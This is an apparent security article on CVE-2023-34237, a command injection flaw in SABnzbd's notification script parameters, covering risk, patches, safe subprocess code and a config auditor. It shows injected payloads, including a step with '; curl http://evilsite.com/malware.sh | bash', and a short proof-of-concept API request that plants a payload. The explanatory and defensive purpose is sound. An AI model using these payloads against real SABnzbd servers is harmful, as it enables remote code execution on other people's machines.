SABnzbd is a popular open source tool for automated downloading from Usenet. As convenient as it is, it recently made news because of a serious security problem: CVE-2023-34237. This vulnerability could let an attacker execute code remotely—basically, getting control of your SABnzbd server if certain conditions are met. In this article, we’ll break down what the issue is, how it works, and how you can protect yourself.
What Is CVE-2023-34237?
In short, CVE-2023-34237 is a design flaw in SABnzbd’s Notification Script feature. This feature is supposed to let you run custom scripts on different events (like when a download finishes). However, due to how SABnzbd passes parameters to these scripts, an attacker with access to SABnzbd’s web interface can manipulate the Parameters field and make the program execute arbitrary commands—basically, run whatever code they want with the same permissions as the SABnzbd process.
TL;DR:
If someone can access your SABnzbd web interface and you haven’t set a username and password, they might be able to run commands on your machine.
How Does the Vulnerability Work?
When you add a new Notification Script in SABnzbd's settings, you can specify custom parameters. The code passed these parameters to the script in a way that didn’t sanitize or securely handle user input (think: shell command injection). A clever attacker can inject special characters or commands that break out from the intended parameter and execute arbitrary code.
Example Exploit
Let’s say your script is called notify.sh, and you set the Parameters field in SABnzbd’s interface to:
some_param; rm -rf /tmp/testdir
If the backend splices that string into a shell command line, for example
    subprocess.call("/path/to/notify.sh " + user_param, shell=True)
and does not sanitize user_param, the shell treats the ; as a command separator: notify.sh receives some_param, and then rm -rf /tmp/testdir runs as a second command, deleting the /tmp/testdir directory. (The list form, subprocess.call(['/path/to/notify.sh', user_param]), is not injectable this way: with no shell involved, the whole string reaches the script as one literal argument. The danger comes from building a command string and running it with shell=True.)
Here’s how an unsafe call might look in Python (for illustration):
    import subprocess
    # BAD: Don't do this. shell=True hands the whole string to /bin/sh,
    # which treats ';' as a command separator and runs what follows it.
    user_input = "PWNED; touch /tmp/pwned"
    subprocess.call(f"./myscript.sh {user_input}", shell=True)
If SABnzbd’s process is running as a privileged user, the attacker could essentially take control of your system.
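To make the difference concrete, here is an added example (it is not code from SABnzbd or from this article) that runs the two patterns side by side. A stand-in "script" simply echoes its argv as JSON, so you can see exactly what the child process receives. run_unsafe splices the Parameters string into a shell command line, the injectable pattern shown above; run_safe passes a list to subprocess with no shell and splits the parameters with shlex, so ; and friends arrive as literal arguments; build_argv adds one more check, refusing a script name that resolves outside the configured script directory. The function names, the scripts directory and the harmless "echo INJECTED" payload are assumptions made for this demonstration, and the hardening shown is a general pattern, not a description of SABnzbd's own fix.

```python
from __future__ import annotations

import json
import shlex
import subprocess
import sys
from pathlib import Path

# Stand-in for notify.sh: a one-line Python program that prints its own
# arguments as JSON, so we can see exactly what the "script" received.
ECHO_ARGV = "import json, sys; print(json.dumps(sys.argv[1:]))"


def run_unsafe(user_params: str) -> str:
    """BAD: the user-controlled Parameters string is spliced into a shell command
    line. Returns the combined stdout, so output of any injected command shows up."""
    cmd = f"{shlex.quote(sys.executable)} -c {shlex.quote(ECHO_ARGV)} {user_params}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def run_safe(user_params: str) -> list[str]:
    """GOOD: no shell. The parameters are split with shlex (it raises ValueError on
    unbalanced quotes) and handed to the child as separate argv entries, so ';',
    '|' or '$(...)' are just bytes inside an argument. Returns the argv the child saw."""
    argv = [sys.executable, "-c", ECHO_ARGV, *shlex.split(user_params)]
    proc = subprocess.run(argv, capture_output=True, text=True, check=True)
    return json.loads(proc.stdout)


def build_argv(script_dir: str | Path, script_name: str, user_params: str) -> list[str]:
    """Extra hardening (an assumed policy, not SABnzbd's): the script must live inside
    the configured script directory, so a user-supplied name cannot point at /bin/sh
    or escape with '..'. Returns an argv list for subprocess.run without a shell."""
    base = Path(script_dir).resolve()
    script = (base / script_name).resolve()
    if base not in script.parents:
        raise ValueError(f"script {script_name!r} resolves outside {base}")
    return [str(script), *shlex.split(user_params)]


if __name__ == "__main__":
    payload = "some_param; echo INJECTED"  # attacker-controlled Parameters value
    print("unsafe stdout:", repr(run_unsafe(payload)))  # INJECTED appears: the shell ran echo
    print("safe argv:    ", run_safe(payload))          # ['some_param;', 'echo', 'INJECTED']
    print("resolved:     ", build_argv("scripts", "notify.sh", payload))
    try:
        build_argv("scripts", "../../bin/sh", "-c id")
    except ValueError as exc:
        print("rejected:     ", exc)
```

Running it shows the whole point in two lines: the shell-based call prints INJECTED because /bin/sh executed the second command, while the list-based call delivers the same string to the script as three ordinary arguments and nothing else runs.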
Who Is at Risk?
- Default Installations: By default, SABnzbd only listens on localhost (your own computer), and the web interface doesn’t require a password.
- Risky Setups: If you changed the settings to allow access beyond localhost (for example, exposing it on your home network or even directly on the internet) without setting a username/password, you’re a sitting duck for this exploit.
How Can It Be Exploited Remotely?
If you exposed SABnzbd to any untrusted network (home WiFi, shared network, the whole internet) and didn't set a login password, then anyone who can reach the web interface can run code as your SABnzbd user. The attack chain is short:
1. SABnzbd is reachable from the untrusted network and no web interface username/password is configured.
2. Attacker opens the web interface, no password needed (common on many misconfigured setups).
3. Attacker goes to the Notifications settings, enables a notification script and sets a custom parameter like ; curl http://evilsite.com/malware.sh | bash.
4. The next event that fires the notification (a finished download, for example) runs the injected command with the permissions of the SABnzbd process.
Proof of Concept (PoC)
Warning: This code is for educational use only; run it only against an instance you own.
If you have SABnzbd accessible at http://target-ip:8080 and there's no authentication:
    import requests

    TARGET = "http://target-ip:8080"      # placeholder host
    API_URL = f"{TARGET}/sabnzbd/api"
    payload = "; touch /tmp/pwned"        # creates /tmp/pwned when the script fires

    params = {
        "mode": "set_config",
        # The config name used here is illustrative; check the SABnzbd API
        # documentation for your version for the exact section/keyword.
        "name": "script_param",
        "value": payload,
        "apikey": "SOME_API_KEY_OR_BLANK_IF_NONE",
    }
    r = requests.get(API_URL, params=params, timeout=10)
    print(r.status_code, r.text[:200])
Then trigger the script notification as normal (for example, let a download finish) and the injected command runs.
The SABnzbd team was quick to respond and patched the flaw in two commits:
- Commit e3a722
- Commit 422b4f
The fix is included in release 4.0.2.
What did they do?
They properly sanitized and validated input parameters before passing them to the executed script, removing the possibility for injection.
- Update to SABnzbd 4.0.2 or later, which contains the fix.
- Set a strong username and password for the web interface (under Settings > General > Security).
- Do NOT expose SABnzbd to the internet or any untrusted network. Restrict it to localhost (127.0.0.1); if you need remote access, reach it over a VPN rather than by opening the port.
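The two conditions in "Who Is at Risk?" and the mitigations just listed come down to one question: is the web interface bound beyond loopback while no username/password is set? The following added example (not code from the SABnzbd project or from this article) answers it from a sabnzbd.ini. It assumes the key names host, port, username and password under the [misc] section of sabnzbd.ini; the three INI fragments are constructed for the example, and the risk labels are this example's own classification.

```python
import configparser
import ipaddress

# Constructed sabnzbd.ini fragments for the example (not captured from a real
# install). The key names host/port/username/password are assumed to match the
# [misc] section of sabnzbd.ini.
INI_LOOPBACK_NOAUTH = """\
[misc]
host = 127.0.0.1
port = 8080
username =
password =
"""

INI_EXPOSED_NOAUTH = """\
[misc]
host = 0.0.0.0
port = 8080
username =
password =
"""

INI_EXPOSED_AUTH = """\
[misc]
host = 0.0.0.0
port = 8080
username = admin
password = correct-horse-battery-staple
"""


def is_loopback(host: str) -> bool:
    """True only if the bind address accepts connections from this machine alone."""
    if host.lower() == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        # A hostname or unparsable value: assume it may be reachable from elsewhere.
        return False


def audit_sabnzbd_ini(ini_text: str) -> dict:
    """Classify an instance against the two conditions the article describes:
    reachable beyond localhost, and no web-interface username/password set."""
    cp = configparser.ConfigParser(interpolation=None)  # a '%' in a password must not be interpolated
    cp.read_string(ini_text)
    misc = cp["misc"]
    host = misc.get("host", "127.0.0.1").strip()
    has_auth = bool(misc.get("username", "").strip() and misc.get("password", "").strip())
    exposed = not is_loopback(host)
    if exposed and not has_auth:
        risk, note = "HIGH", "reachable from the network with no login: the unauthenticated path is open"
    elif exposed:
        risk, note = "MEDIUM", "a login is set, but the interface is still reachable beyond localhost"
    elif not has_auth:
        risk, note = "LOW", "no login, but only local processes can reach the interface"
    else:
        risk, note = "OK", "loopback only and a login is set"
    return {"host": host, "port": misc.get("port", "8080"), "exposed": exposed,
            "has_auth": has_auth, "risk": risk, "note": note}


if __name__ == "__main__":
    for name, ini in [("loopback/no auth", INI_LOOPBACK_NOAUTH),
                      ("exposed/no auth", INI_EXPOSED_NOAUTH),
                      ("exposed/auth", INI_EXPOSED_AUTH)]:
        r = audit_sabnzbd_ini(ini)
        print(f"{name:18} host={r['host']:<10} risk={r['risk']:<6} {r['note']}")
```

Point it at the real file with audit_sabnzbd_ini(open(path).read()). A host of 0.0.0.0 or :: means every interface, which is the "risky setup" above; a HIGH result is exactly the combination the PoC section relies on, and a MEDIUM result still warrants moving the instance behind a VPN.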
Official References
- GitHub Security Advisory
- Issue Tracker
- Release Notes (4.0.2)
- NVD Listing: https://nvd.nist.gov/vuln/detail/CVE-2023-34237
Final Thoughts
CVE-2023-34237 is a reminder that even popular, trusted open source tools can have dangerous flaws—especially when running user-provided scripts. Always keep your software up-to-date, protect your web tools with passwords, and never expose applications like SABnzbd directly to the internet.
Timeline
Published on: 06/07/2023 20:15:00 UTC
Last modified on: 06/22/2023 00:05:00 UTC